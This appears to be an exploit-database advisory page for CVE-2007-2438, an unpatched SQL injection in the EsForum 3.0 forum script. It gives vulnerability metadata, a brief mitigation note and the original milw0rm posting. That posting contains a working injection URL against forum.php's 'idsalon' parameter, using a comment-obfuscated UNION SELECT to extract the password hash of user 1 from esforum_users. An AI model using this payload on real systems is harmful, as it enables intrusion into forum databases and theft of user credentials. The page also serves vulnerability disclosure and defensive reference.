header-logo
Suggest Exploit
vendor:
EsForum
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EsForum
Affected Version From: EsForum 3.0
Affected Version To: EsForum 3.0
Patch Exists: NO
Related CWE: CVE-2007-2438
CPE: a:esforum:esforum:3.0
Other Scripts:
Platforms Tested:
2007

EsForum 3.0 SQL Injection Vulnerability

The vulnerability allows an attacker to inject arbitrary SQL code into the 'idsalon' parameter of the 'forum.php' page, leading to unauthorized access to the database and potentially compromising user information. The exploit retrieves the hashed passwords of all users from the 'esforum_users' table where the 'user_id' is 1.

Mitigation:

To mitigate this vulnerability, the developer should implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...


Script: EsForum 3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

info:
*/  MEFISTO Begins. */

-------------------------------------------------------------------------------------------------------------------
Exploit:

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

-------------------------------------------------------------------------------------------------------------------


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-04-26]